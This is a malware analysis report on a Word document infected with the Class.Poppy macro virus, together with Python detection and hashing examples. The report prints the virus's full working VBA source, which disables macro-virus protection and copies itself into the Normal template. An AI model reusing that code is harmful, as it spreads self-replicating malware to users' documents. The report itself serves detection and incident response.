Risk Score: 156 (MALICIOUS)
Malware Insights
MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1137.001 Office Application Startup: Office Template Macros
T1562.001 Impair Defenses: Disable or Modify Tools
T1112 Modify Registry
T1027 Obfuscated Files or Information
The sample is a W97M/Class macro virus (its payload names itself "Class.Poppy" and its registry strings carry the VicodinES signature); the ClamAV hit Doc.Trojan.Class-1 below agrees. The AutoOpen macro first turns off Word's macro-virus protection and the prompts that would reveal a modified Normal template (Options.VirusProtection, Options.SaveNormalPrompt and Options.ConfirmConversions are all set to False), then reads CountOfLines of its own ThisDocument module (ad) and of the Normal template's module (nt) to pick the infection direction. If Normal is clean (nt < 70), it exports the document module to c:\class.sys, pulls that file into Normal with CodeModule.AddFromFile, deletes the first 16 lines of the imported text, and patches the copy so that its entry point becomes AutoClose and its ViewVBCode stub becomes ToolsMacro (a macro named after a built-in Word command overrides it, so View Code and Tools > Macro stop opening the macro dialogs). If Normal is already infected and the current document is clean (nt > 70 and ad = 0), the template copy imports c:\class.sys into the document and saves it in place; if both are infected it exits. Every even line of the written copy is then overwritten with a comment built from Application.UserName, Now, Application.ActivePrinter and Application.ActiveWindow, which is why the extracted script alternates code with 'wxj99-10-29 8:47:46… lines (user wxj, 29 October 1999, and the active window caption, the Chinese string 铁三院需求): the marker makes every generation hash differently, and it is the basis for the T1027 mapping. On first infection of a machine the macro also tries to set RegisteredOwner to "VicodinES /CB /TNN" and RegisteredOrganization to "-(Dr. Diet Mountain Dew)-" under HKLM\Software\Microsoft\Windows\CurrentVersion through advapi32 RegOpenKeyExA/RegSetValueExA; note that KEY_ALL_ACCESS is never declared (the module has no Option Explicit, so it evaluates to 0) and cbData is passed as 1, so those writes are unlikely to land as intended. The only other payload is a message box on the 14th of any month after May ("I Think <user> is a big stupid jerk!", titled "Class.Poppy"). The script touches no Run key and no Office VBAWarnings value; persistence is through the Normal template alone, and any runtime error is swallowed by On Error GoTo out. The critical OLE_VBA_MACRO_VIRUS_REPLICATION heuristic together with the AutoOpen/AutoClose entry points is enough to classify the document as malicious independent of any signature.
Heuristics: 4

- VBA macros detected (medium, 3 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- VBA macro-virus self-replication / AV tampering (critical) OLE_VBA_MACRO_VIRUS_REPLICATION: VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature. Matched line in script: Options.VirusProtection = False (the sample also calls AddFromFile, DeleteLines and ReplaceLine on code modules reached through NormalTemplate.VBProject and ActiveDocument.VBProject)
- AutoOpen macro (low) OLE_VBA_AUTOOPEN: AutoOpen macro. Matched line in script: Sub AutoOpen()
- Auto_Close macro (low) OLE_VBA_AUTOCLOSE: Auto_Close macro. Matched line in script: .replaceline 1, "Sub AutoClose()" (a string literal: this document's copy has no AutoClose procedure of its own; the virus renames the entry point to AutoClose in the copy it writes into the Normal template, so the template copy fires whenever a document is closed)
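The four heuristics above can be reproduced without the analyzer. The following is an added example, not the analyzer's or oletools' own code: it re-implements the gist of OLE_VBA_MACRO_VIRUS_REPLICATION, OLE_VBA_AUTOOPEN and OLE_VBA_AUTOCLOSE as regular expressions over the VBA text that olevba extracts (rule names mirror the report; the regexes, the extra NormalTemplate rule, the severities and the verdict mapping are this example's own) and runs them over a constructed excerpt of the script shown further down.

```python
"""Heuristic scan of decoded VBA source for macro-virus behaviour.

Added example, not the analyzer's code. Rule names mirror the report; the
regexes, severities and verdict mapping are this example's own choices.
"""
import re
from typing import Dict, List, Tuple

SEVERITY = {"low": 1, "medium": 2, "critical": 3}

# Per-line indicators. VBA is case-insensitive, hence re.I on every pattern.
LINE_RULES = [
    ("OLE_VBA_AUTOOPEN", "low",
     re.compile(r"\bSub\s+(?:AutoOpen|Auto_Open|Document_Open)\s*\(", re.I)),
    ("OLE_VBA_AUTOCLOSE", "low",
     re.compile(r"\bSub\s+(?:AutoClose|Auto_Close|Document_Close)\s*\(", re.I)),
    ("OLE_VBA_VIRUSPROTECTION_OFF", "critical",
     re.compile(r"\bOptions\s*\.\s*VirusProtection\s*=\s*False\b", re.I)),
    # Assumed extra rule: reaching into the global template's VBA project.
    ("OLE_VBA_NORMAL_TEMPLATE_VBPROJECT", "medium",
     re.compile(r"\bNormalTemplate\s*\.\s*VBProject\b", re.I)),
]

# Self-replication needs two things anywhere in the module: a handle on the
# VBE object model and a method that rewrites module text through it.
VBE_OBJECT = re.compile(r"\b(?:VBProject|VBComponents|CodeModule)\b", re.I)
VBE_MUTATOR = re.compile(
    r"\.\s*(?:InsertLines|DeleteLines|ReplaceLine|AddFromString|AddFromFile|OrganizerCopy)\b",
    re.I)


def code_lines(src: str) -> List[str]:
    """Drop comment-only lines; the virus fills every second line with one."""
    return [ln for ln in src.splitlines() if not ln.lstrip().startswith("'")]


def scan_vba(src: str) -> List[Tuple[str, str, str]]:
    """Return (rule, severity, first matched line) for each triggered rule."""
    lines = code_lines(src)
    hits: Dict[str, Tuple[str, str]] = {}
    for ln in lines:
        for name, sev, rx in LINE_RULES:
            # The AutoClose rule also fires on the string literal
            # .replaceline 1, "Sub AutoClose()", exactly as the report's did.
            if name not in hits and rx.search(ln):
                hits[name] = (sev, ln.strip())
    mutators = [ln for ln in lines if VBE_MUTATOR.search(ln)]
    if mutators and any(VBE_OBJECT.search(ln) for ln in lines):
        hits["OLE_VBA_MACRO_VIRUS_REPLICATION"] = ("critical", mutators[0].strip())
    return [(name, sev, line) for name, (sev, line) in hits.items()]


def verdict(findings: List[Tuple[str, str, str]]) -> str:
    """Worst severity seen decides the label (this example's own mapping)."""
    worst = max((SEVERITY[sev] for _, sev, _ in findings), default=0)
    return ("clean", "low-risk", "suspicious", "malicious")[worst]


# Constructed excerpt of the extracted script: the Class.Poppy lines the
# rules care about, one of the virus's marker comments included.
SAMPLE = "\n".join([
    'Private Declare Function RegOpenKeyExA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long',
    "Sub AutoOpen()",
    "'wxj99-10-29 8:47:46",
    "On Error GoTo out",
    "Options.VirusProtection = False",
    "ad = ActiveDocument.VBProject.VBComponents.Item(1).codemodule.CountOfLines",
    "nt = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines",
    "If nt < 70 Then",
    "Set host = NormalTemplate.VBProject.VBComponents.Item(1)",
    'ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\\class.sys"',
    "End If",
    'host.codemodule.AddFromFile ("c:\\class.sys")',
    "With host.codemodule",
    ".deletelines 1",
    '.replaceline 1, "Sub AutoClose()"',
    "End With",
    "out:",
    "End Sub",
])

# A constructed benign control: an AutoOpen that only greets the user.
BENIGN = 'Sub AutoOpen()\n    MsgBox "Welcome"\nEnd Sub\n'

if __name__ == "__main__":
    for name, sev, line in scan_vba(SAMPLE):
        print(f"{sev:9} {name}: {line}")
    print("verdict:", verdict(scan_vba(SAMPLE)))
    print("benign verdict:", verdict(scan_vba(BENIGN)))
```

The replication rule deliberately requires both halves (object-model access and a text-mutating method) so that code which merely reads CountOfLines, or an add-in that calls AddFromString on its own project, does not trip it on its own; the benign control still earns a low-risk label for its AutoOpen, which matches how the report weighs that indicator.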
Extracted artifacts: 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4815 bytes | 62a856f005bb2d7f2b8a22e3f1f589784084dda16941a154e13f67996f5b839d |

Because the virus rewrites every even line of each copy with a per-infection comment, this hash identifies this generation only; other infected documents from the same outbreak will carry the same code with different hashes.

Detection
ClamAV: Doc.Trojan.Class-1
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Declare Function RegOpenKeyExA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
'wxj99-10-29 8:47:46铁三院需求
Private Declare Function RegSetValueExA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpValue As String, ByVal cbData As Long) As Long
'wxj99-10-29 8:47:46铁三院需求
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
'wxj99-10-29 8:47:46铁三院需求
Const REG_SZ As Long = 1
'wxj99-10-29 8:47:46铁三院需求
Const HKEY_CURRENT_USER As Long = &H80000001
'wxj99-10-29 8:47:46铁三院需求
Const HKEY_LOCAL_MACHINE As Long = &H80000002
'wxj99-10-29 8:47:46铁三院需求
Sub AutoOpen()
'wxj99-10-29 8:47:46铁三院需求
On Error GoTo out
'wxj99-10-29 8:47:46铁三院需求
Options.VirusProtection = False
'wxj99-10-29 8:47:46铁三院需求
Options.SaveNormalPrompt = False
'wxj99-10-29 8:47:46铁三院需求
Options.ConfirmConversions = False
'wxj99-10-29 8:47:46铁三院需求
ad = ActiveDocument.VBProject.VBComponents.Item(1).codemodule.CountOfLines
'wxj99-10-29 8:47:46铁三院需求
nt = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines
'wxj99-10-29 8:47:47铁三院需求
If nt > 70 And ad > 0 Then GoTo out
'wxj99-10-29 8:47:47铁三院需求
If nt < 70 Then
'wxj99-10-29 8:47:47铁三院需求
Set host = NormalTemplate.VBProject.VBComponents.Item(1)
'wxj99-10-29 8:47:47铁三院需求
ActiveDocument.VBProject.VBComponents.Item(1).Name = host.Name
'wxj99-10-29 8:47:47铁三院需求
ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\class.sys"
'wxj99-10-29 8:47:47铁三院需求
End If
'wxj99-10-29 8:47:47铁三院需求
If ad = 0 Then Set host = ActiveDocument.VBProject.VBComponents.Item(1)
'wxj99-10-29 8:47:47铁三院需求
If Day(Now) = 14 And Month(Now) > 5 Then MsgBox "I Think " & Application.UserName & " is a big stupid jerk!", 0, "Class.Poppy"
'wxj99-10-29 8:47:47铁三院需求
host.codemodule.AddFromFile ("c:\class.sys")
'wxj99-10-29 8:47:47铁三院需求
With host.codemodule
'wxj99-10-29 8:47:47铁三院需求
For x = 1 To 16
'wxj99-10-29 8:47:47铁三院需求
.deletelines 1
'wxj99-10-29 8:47:47铁三院需求
Next x
'wxj99-10-29 8:47:47铁三院需求
End With
'wxj99-10-29 8:47:47铁三院需求
If nt < 70 Then
'wxj99-10-29 8:47:47铁三院需求
With host.codemodule
'wxj99-10-29 8:47:47铁三院需求
.replaceline 1, "Sub AutoClose()"
'wxj99-10-29 8:47:47铁三院需求
.replaceline 91, "Sub ToolsMacro()"
'wxj99-10-29 8:47:47铁三院需求
For x = 70 To 81
'wxj99-10-29 8:47:47铁三院需求
.deletelines 62
'wxj99-10-29 8:47:47铁三院需求
Next x
'wxj99-10-29 8:47:47铁三院需求
.replaceline 35, " For x = 1 To 4"
'wxj99-10-29 8:47:47铁三院需求
End With
'wxj99-10-29 8:47:47铁三院需求
End If
'wxj99-10-29 8:47:47铁三院需求
If nt < 70 Then
'wxj99-10-29 8:47:47铁三院需求
u = RegOpenKeyExA(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion", 0, KEY_ALL_ACCESS, k)
'wxj99-10-29 8:47:47铁三院需求
u = RegSetValueExA(k, "RegisteredOwner", 0, REG_SZ, "VicodinES /CB /TNN", 1)
'wxj99-10-29 8:47:47铁三院需求
u = RegSetValueExA(k, "RegisteredOrganization", 0, REG_SZ, "-(Dr. Diet Mountain Dew)-", 1)
'wxj99-10-29 8:47:47铁三院需求
u = RegCloseKey(k)
'wxj99-10-29 8:47:47铁三院需求
End If
'wxj99-10-29 8:47:47铁三院需求
With host.codemodule
'wxj99-10-29 8:47:47铁三院需求
For x = 2 To 104 Step 2
'wxj99-10-29 8:47:47铁三院需求
.replaceline x, "'" & Application.UserName & Now & Application.ActivePrinter & Application.ActiveWindow
'wxj99-10-29 8:47:47铁三院需求
Next x
'wxj99-10-29 8:47:47铁三院需求
End With
'wxj99-10-29 8:47:47铁三院需求
out:
'wxj99-10-29 8:47:47铁三院需求
If nt > 70 And ad = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
'wxj99-10-29 8:47:47铁三院需求
End Sub
'wxj99-10-29 8:47:47铁三院需求
Sub ViewVBCode()
'wxj99-10-29 8:47:47ÌúÈýÔºÐèÇó
End Sub
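The comment lines interleaved with the code above are the virus's infection marker: the loop `For x = 2 To 104 Step 2` overwrites every even line of each copy with Application.UserName & Now & Application.ActivePrinter & Application.ActiveWindow, so the SHA-256 of macros.bas differs for every infected document. The following added example, not the analyzer's code, hashes only the code lines to get a value that stays the same across those markers, and parses the marker back into its fields. It assumes the yy-mm-dd h:mm:ss form of Now seen in this sample (the format is locale dependent) and uses two constructed generations of a trimmed module, the first reusing the sample's own marker with the window caption as the GBK text 铁三院需求.

```python
"""Stable family hash and infection marker for a polymorphic macro virus.

Added example, not the analyzer's code. Class.Poppy rewrites every even
line of each copy with a comment built from UserName, Now, ActivePrinter
and ActiveWindow, so the raw hash of macros.bas changes per infection.
"""
import hashlib
import re
from typing import Dict, Optional

COMMENT = re.compile(r"^\s*'")
ATTRIBUTE = re.compile(r"^\s*Attribute\s+VB_", re.I)  # olevba header lines, not VBE code

# UserName & Now & ActivePrinter & ActiveWindow are concatenated with no
# separator. Assumption of this example: Now renders as "yy-mm-dd h:mm:ss"
# as in the sample (locale dependent); a user name ending in digits would
# be mis-split.
MARKER = re.compile(
    r"^\s*'(?P<user>.*?)(?P<when>\d{2,4}-\d{1,2}-\d{1,2} \d{1,2}:\d{2}:\d{2})(?P<rest>.*)$")


def normalize_vba(src: str) -> str:
    """Keep code lines only, collapse whitespace, lower-case (VBA is case-insensitive)."""
    keep = []
    for ln in src.splitlines():
        if not ln.strip() or COMMENT.match(ln) or ATTRIBUTE.match(ln):
            continue
        keep.append(" ".join(ln.split()).lower())
    return "\n".join(keep)


def family_hash(src: str) -> str:
    """SHA-256 over the normalized code, stable across marker rewrites."""
    return hashlib.sha256(normalize_vba(src).encode("utf-8")).hexdigest()


def raw_hash(src: str) -> str:
    """SHA-256 of the text as extracted, i.e. what the report lists."""
    return hashlib.sha256(src.encode("utf-8")).hexdigest()


def infection_marker(src: str) -> Optional[Dict[str, str]]:
    """Fields of the first marker comment, or None if the module has none."""
    for ln in src.splitlines():
        m = MARKER.match(ln)
        if m:
            return m.groupdict()
    return None


# Two constructed generations of the same code; only the marker differs.
CODE = [
    'Attribute VB_Name = "ThisDocument"',
    "Sub AutoOpen()",
    "{marker}",
    "On Error GoTo out",
    "{marker}",
    "Options.VirusProtection = False",
    "{marker}",
    "out:",
    "{marker}",
    "End Sub",
]
GEN_A = "\n".join(CODE).format(marker="'wxj99-10-29 8:47:46铁三院需求")
GEN_B = "\n".join(CODE).format(marker="'alice01-06-14 9:01:02Microsoft Word - report.doc")

if __name__ == "__main__":
    print("raw hashes equal:   ", raw_hash(GEN_A) == raw_hash(GEN_B))
    print("family hashes equal:", family_hash(GEN_A) == family_hash(GEN_B))
    print(infection_marker(GEN_A))
    print(infection_marker(GEN_B))
```

Expect two stable hashes per outbreak rather than one: the copy written into Normal.dot has its first line changed to Sub AutoClose(), line 91 to Sub ToolsMacro(), twelve lines removed at line 62 and the loop bound changed to 4, so template-side and document-side generations normalize to different code. The marker fields (user name, infection time, printer and window caption) are what make the comments worth keeping in an incident timeline even though they are noise for signature purposes.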